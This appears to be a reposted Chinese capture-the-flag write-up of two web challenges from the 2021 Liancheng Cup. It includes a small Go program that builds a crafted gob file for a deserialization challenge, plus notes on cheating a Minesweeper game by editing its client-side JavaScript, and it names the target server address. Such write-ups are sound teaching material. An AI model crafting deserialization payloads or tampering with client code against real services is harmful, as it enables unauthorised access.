#|2021莲城杯web部分wp
easy_go
文章图片
go反序列化,现学现卖,和python反序列化很像
html源码中有提示
文章图片
【#|2021莲城杯web部分wp】poc-main.go
package main
import (
"encoding/gob"
"fmt"
"os"
)
type person struct { Name string
}func main(){file, err := os.Create("./gob")
if err != nil {fmt.Println(err)
}
user := person{
Name: "You_Got_It"}
enc := gob.NewEncoder(file)
err2 := enc.Encode(user)
fmt.Println(err2)
}
运行后生成gob文件
文章图片
上传生成的文件,get flag
文章图片
Minesweepe
Minesweepe看js文件,点击开始游戏,直接改炸弹数量,开挂玩
题目内容:扫个雷吧,三个难度都通关了即可获得flag哦.靶机:183.129.189.60:10005
题目分值:100.0
题目难度:容易
文章图片
文章图片
三个关卡分别是flag的三部分
链图片转存中…(img-OwuAGpbn-1633959534518)]
三个关卡分别是flag的三部分
只有两个web也只看了两个web,挺简单的,没什么难度
推荐阅读
- 2021-02-17|2021-02-17 小儿按摩膻中穴-舒缓咳嗽
- 2021-02-10(找不回的“年味”……)
- 2021-05-05五一的五天假期结束了
- 2021/1/15|2021/1/15 数幸福
- 20210307《挑战赛怂人胆》【能量将帅挑战赛(01)】
- 私有化轻量级持续集成部署方案--03-部署web服务(下)
- web网页模板|如此优秀的JS轮播图,写完老师都沉默了
- 2020年,告别焦虑的自己,2021年,期待满意的自己。
- 今天开心的三件事(第454天,20210125,星期一,阴)
- spring|spring boot项目启动websocket